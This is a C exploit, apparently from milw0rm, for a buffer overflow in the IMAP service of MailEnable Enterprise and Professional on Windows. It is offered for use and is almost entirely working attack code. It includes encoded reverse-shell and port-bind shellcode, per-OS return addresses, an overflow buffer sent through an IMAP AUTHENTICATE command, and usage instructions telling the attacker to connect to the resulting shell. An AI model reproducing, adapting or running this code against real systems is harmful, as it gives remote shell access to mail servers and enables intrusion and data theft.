/*
+--=[--------------------------x0n3-h4ck Team Presents---------------------------]=--+
+--=[ ]=--+
+--=[ MailEnable (Enterprise <= 1.04)(Professional <= 1.54) remote Imapd exploit ]=--+
+--=[ ]=--+
+--=[ Bug discovered by..: Corryl (Corryl80@gmail.com) ]=--+
+--=[ Exploit coded by...: Expanders (expanders@gmail.com) ]=--+
+--=[ wwww.x0n3-h4ck.org ]=--+
+--=[----------------------------------------------------------------------------]=--+
Personal greetz goes to: crash-x for some code from his Cyrus Imapd sploit
cybertronic for reverse shellcode
K-C0d3r for coding support
x0n3-h4ck.org Members and Friends
*/
#include <stdio.h>
#include <stdlib.h>
#include <stdarg.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <netdb.h>
/*
Connectback Shellcode ::: 316 byte
Link points:
Ip : [111] unsigned long (xored 0x99999999)
Port: [118] unsigned short (xored 0x9999)
*/
unsigned char reverse_sc[] =
"\xEB\x10\x5B\x4B\x33\xC9\x66\xB9\x25\x01\x80\x34\x0B\x99\xE2\xFA"
"\xEB\x05\xE8\xEB\xFF\xFF\xFF\x70\x62\x99\x99\x99\xC6\xFD\x38\xA9"
"\x99\x99\x99\x12\xD9\x95\x12\xE9\x85\x34\x12\xF1\x91\x12\x6E\xF3"
"\x9D\xC0\x71\x02\x99\x99\x99\x7B\x60\xF1\xAA\xAB\x99\x99\xF1\xEE"
"\xEA\xAB\xC6\xCD\x66\x8F\x12\x71\xF3\x9D\xC0\x71\x1B\x99\x99\x99"
"\x7B\x60\x18\x75\x09\x98\x99\x99\xCD\xF1\x98\x98\x99\x99\x66\xCF"
"\x89\xC9\xC9\xC9\xC9\xD9\xC9\xD9\xC9\x66\xCF\x8D\x12\x41\xF1\xE6"
"\x99\x99\x98\xF1\x9B\x99\x9D\x4B\x12\x55\xF3\x89\xC8\xCA\x66\xCF"
"\x81\x1C\x59\xEC\xD3\xF1\xFA\xF4\xFD\x99\x10\xFF\xA9\x1A\x75\xCD"
"\x14\xA5\xBD\xF3\x8C\xC0\x32\x7B\x64\x5F\xDD\xBD\x89\xDD\x67\xDD"
"\xBD\xA4\x10\xC5\xBD\xD1\x10\xC5\xBD\xD5\x10\xC5\xBD\xC9\x14\xDD"
"\xBD\x89\xCD\xC9\xC8\xC8\xC8\xF3\x98\xC8\xC8\x66\xEF\xA9\xC8\x66"
"\xCF\x9D\x12\x55\xF3\x66\x66\xA8\x66\xCF\x91\xCA\x66\xCF\x85\x66"
"\xCF\x95\xC8\xCF\x12\xDC\xA5\x12\xCD\xB1\xE1\x9A\x4C\xCB\x12\xEB"
"\xB9\x9A\x6C\xAA\x50\xD0\xD8\x34\x9A\x5C\xAA\x42\x96\x27\x89\xA3"
"\x4F\xED\x91\x58\x52\x94\x9A\x43\xD9\x72\x68\xA2\x86\xEC\x7E\xC3"
"\x12\xC3\xBD\x9A\x44\xFF\x12\x95\xD2\x12\xC3\x85\x9A\x44\x12\x9D"
"\x12\x9A\x5C\x32\xC7\xC0\x5A\x71\x99\x66\x66\x66\x17\xD7\x97\x75"
"\xEB\x67\x2A\x8F\x34\x40\x9C\x57\x76\x57\x79\xF9\x52\x74\x65\xA2"
"\x40\x90\x6C\x34\x75\x60\x33\xF9\x7E\xE0\x5F\xE0";
/*
Portbind Shellcode ::: 492 byte
Link points:
Port: [266] unsigned short (xored 0x8888)
*/
unsigned char portbind_sc[] =
"\x90\x90\x90\x90\x90\x90\x90\x90"
"\xEB\x03\x5D\xEB\x05\xE8\xF8\xFF"
"\xFF\xFF\x8B\xC5\x83\xC0\x11\x33\xC9\x66\xB9\xC9\x01\x80\x30\x88"
"\x40\xE2\xFA\xDD\x03\x64\x03\x7C\x09\x64\x08\x88\x88\x88\x60\xC4"
"\x89\x88\x88\x01\xCE\x74\x77\xFE\x74\xE0\x06\xC6\x86\x64\x60\xD9"
"\x89\x88\x88\x01\xCE\x4E\xE0\xBB\xBA\x88\x88\xE0\xFF\xFB\xBA\xD7"
"\xDC\x77\xDE\x4E\x01\xCE\x70\x77\xFE\x74\xE0\x25\x51\x8D\x46\x60"
"\xB8\x89\x88\x88\x01\xCE\x5A\x77\xFE\x74\xE0\xFA\x76\x3B\x9E\x60"
"\xA8\x89\x88\x88\x01\xCE\x46\x77\xFE\x74\xE0\x67\x46\x68\xE8\x60"
"\x98\x89\x88\x88\x01\xCE\x42\x77\xFE\x70\xE0\x43\x65\x74\xB3\x60"
"\x88\x89\x88\x88\x01\xCE\x7C\x77\xFE\x70\xE0\x51\x81\x7D\x25\x60"
"\x78\x88\x88\x88\x01\xCE\x78\x77\xFE\x70\xE0\x2C\x92\xF8\x4F\x60"
"\x68\x88\x88\x88\x01\xCE\x64\x77\xFE\x70\xE0\x2C\x25\xA6\x61\x60"
"\x58\x88\x88\x88\x01\xCE\x60\x77\xFE\x70\xE0\x6D\xC1\x0E\xC1\x60"
"\x48\x88\x88\x88\x01\xCE\x6A\x77\xFE\x70\xE0\x6F\xF1\x4E\xF1\x60"
"\x38\x88\x88\x88\x01\xCE\x5E\xBB\x77\x09\x64\x7C\x89\x88\x88\xDC"
"\xE0\x89\x89\x88\x88\x77\xDE\x7C\xD8\xD8\xD8\xD8\xC8\xD8\xC8\xD8"
"\x77\xDE\x78\x03\x50\xDF\xDF\xE0\x8A\x88\xAB\x6F\x03\x44\xE2\x9E"
"\xD9\xDB\x77\xDE\x64\xDF\xDB\x77\xDE\x60\xBB\x77\xDF\xD9\xDB\x77"
"\xDE\x6A\x03\x58\x01\xCE\x36\xE0\xEB\xE5\xEC\x88\x01\xEE\x4A\x0B"
"\x4C\x24\x05\xB4\xAC\xBB\x48\xBB\x41\x08\x49\x9D\x23\x6A\x75\x4E"
"\xCC\xAC\x98\xCC\x76\xCC\xAC\xB5\x01\xDC\xAC\xC0\x01\xDC\xAC\xC4"
"\x01\xDC\xAC\xD8\x05\xCC\xAC\x98\xDC\xD8\xD9\xD9\xD9\xC9\xD9\xC1"
"\xD9\xD9\x77\xFE\x4A\xD9\x77\xDE\x46\x03\x44\xE2\x77\x77\xB9\x77"
"\xDE\x5A\x03\x40\x77\xFE\x36\x77\xDE\x5E\x63\x16\x77\xDE\x9C\xDE"
"\xEC\x29\xB8\x88\x88\x88\x03\xC8\x84\x03\xF8\x94\x25\x03\xC8\x80"
"\xD6\x4A\x8C\x88\xDB\xDD\xDE\xDF\x03\xE4\xAC\x90\x03\xCD\xB4\x03"
"\xDC\x8D\xF0\x8B\x5D\x03\xC2\x90\x03\xD2\xA8\x8B\x55\x6B\xBA\xC1"
"\x03\xBC\x03\x8B\x7D\xBB\x77\x74\xBB\x48\x24\xB2\x4C\xFC\x8F\x49"
"\x47\x85\x8B\x70\x63\x7A\xB3\xF4\xAC\x9C\xFD\x69\x03\xD2\xAC\x8B"
"\x55\xEE\x03\x84\xC3\x03\xD2\x94\x8B\x55\x03\x8C\x03\x8B\x4D\x63"
"\x8A\xBB\x48\x03\x5D\xD7\xD6\xD5\xD3\x4A\x8C\x88";
int make_bindshell(int port);
int make_reverseshell(char *ip, char *port);
void help(char *program_name);
struct vuln{char *platform;char *retloc;char *ecxloc;} targets[]= {
{ "Windows 2003 - M. E. Enterprise", "\xEC\xDA\x07\x01", "\xE4\xDA\x07\x01", },
{ "Windows 2003 - M. E. Professional", "\xEC\xDA\x08\x01", "\xE4\xDA\x08\x01", },
{ "Windows 2k Sp4 - M. E. Enterprise", "\x80\xE3\x69\x01", "\x78\xE3\x69\x01", },
{ "Windows 2k Sp4 - M. E. Professional", "\x80\xE3\x6A\x01", "\x78\xE3\x6A\x01", },
{ "Windows XP Sp2 - M. E. Enterprise", "\xF4\x22\x19\x01", "\xEC\x22\x19\x01", },
{ "Windows XP Sp2 - M. E. Professional", "\xF4\x22\xB2\x00", "\xEC\x22\xB2\x00", },
{ "Windows XP Sp1 - M. E. Enterprise", "\xF4\x22\x03\x01", "\xEC\x22\x03\x01", },
{ "Windows XP Sp1 - M. E. Professional", "\xE8\xDA\x02\x01", "\xE0\xDA\x02\x01", },
{ NULL }
};
int main(int argc, char *argv[]) {
struct sockaddr_in trg;
struct hostent *he;
long addr;
unsigned short port;
unsigned long ip;
int sockfd, buff,rc,opt,i;
int target=0,rport=143,lport=7320;
char *host=NULL,*lhost=NULL,*cbport;
char evilbuf[2048];
char buffer[1024];
char *request;
if(argc < 3 ) {
help(argv[0]);
exit(0);
}
while ((opt = getopt (argc, argv, "h:p:t:b:r:")) != -1){
switch (opt){
case 'h':
host = optarg;
break;
case 'p':
rport = atoi(optarg);
if(rport > 65535 || rport < 1){
printf("[-] Port %d is invalid\n",rport);
return 1;
}
break;
case 't':
target = atoi(optarg);
for(i = 0; targets[i].platform; i++);
if(target >= i && target != 1337){
printf("[-] Wtf are you trying to target?\n");
help(argv[0]);
}
break;
case 'b':
lport = atoi(optarg);
cbport = optarg;
if(lport > 65535 || lport < 1){
printf("[-] Port %d is invalid\n",lport);
return 1;
}
break;
case 'r':
lhost = optarg;
break;
default:
help(argv[0]);
}
}
if(host == NULL)
help(argv[0]);
printf("\n\n-=[ MailEnable Imapd remote exploit ::: Coded by Expanders ]=-\n");
he = gethostbyname(host);
sockfd = socket(AF_INET, SOCK_STREAM, 0);
request = (char *) malloc(12344);
trg.sin_family = AF_INET;
trg.sin_port = htons(rport);
trg.sin_addr = *((struct in_addr *) he->h_addr);
memset(&(trg.sin_zero), '\0', 8);
printf("\n\n[-] Targeting: %s\n",targets[target].platform);
if ( lhost != NULL )
printf("[-] Reverse Shell on %s:%d\n\n",lhost,lport);
else
printf("[-] Bind Shell on %s:%d\n\n",host,lport);
printf("[-]Connecting to target \t...");
rc=connect(sockfd, (struct sockaddr *)&trg, sizeof(struct sockaddr_in));
if(rc==0) {
printf("[Done]\n[-]Building evil buffer \t...");
memset(evilbuf,'A',1016);
memcpy(evilbuf+1016,targets[target].ecxloc,4);;
memset(evilbuf+1020,'A',2);
memcpy(evilbuf+1022,targets[target].ecxloc,4);
memcpy(evilbuf+1026,targets[target].retloc,4);
memset(evilbuf+1030,0x90,4);
if ( lhost == NULL) {
make_bindshell(lport);
memcpy(evilbuf+1034,portbind_sc,sizeof(portbind_sc));
} else {
make_reverseshell(lhost,cbport);
memcpy(evilbuf+1034,reverse_sc,sizeof(reverse_sc));
}
printf("[Done]\n[-]Sending evil request \t...");
sprintf(request,"A001 AUTHENTICATE %s\r\n",evilbuf);
send(sockfd,request,strlen(request),0);
buff=recv(sockfd, buffer, 256, 0);
if ( lhost == NULL)
printf("[Done]\n\n[------Now-telnet-(%s %d)------]\n\n",host,lport);
else
printf("[Done]\n\n[------Now-wait-reverse-on-port-%d------]\n\n",lport);
}
else
printf("[Fail] -> Unable to connect\n\n");
close(sockfd);
return 0;
}
int make_bindshell(int port) {
port = htons(port^(unsigned short)0x8888);
memcpy(&portbind_sc[266], &port, 2);
}
int make_reverseshell(char *ip, char *port) {
unsigned long xorip;
unsigned short xorport;
xorip = inet_addr(ip)^(unsigned long)0x99999999;
xorport = htons(atoi( port )^(unsigned short)0x9999);
memcpy ( &reverse_sc[111], &xorip, 4);
memcpy ( &reverse_sc[118], &xorport, 2);
}
void help(char *program_name) {
int i;
printf("\n\t-=[ Mail Enable Pro & Enterprise Imapd Remote Exploit ]=-\n");
printf("\t-=[ www.x0n3-h4ck.org ]=-\n");
printf("\t-=[ Discovered by CorryL Coded by Expanders ]=-\n\n");
printf("Usage: %s -h <Host> [parameters]\n\n",program_name);
printf("Parameters:\n");
printf("\t\t-h <host> : Host to attack\n");
printf("\t\t-p <port> : Imapd Port (Default 143)\n");
printf("\t\t-t <target> : Target type (Default 0)\n");
printf("\t\t-b <port> : Bind or reverse shell port (Default 7320)\n");
printf("\t\t-r <host> : Local ip for reverse shell\n");
printf("Target List:\n");
for(i = 0; targets[i].platform; i++)
printf("\t\t%d\t %s\n", i, targets[i].platform);
}
// milw0rm.com [2005-04-05]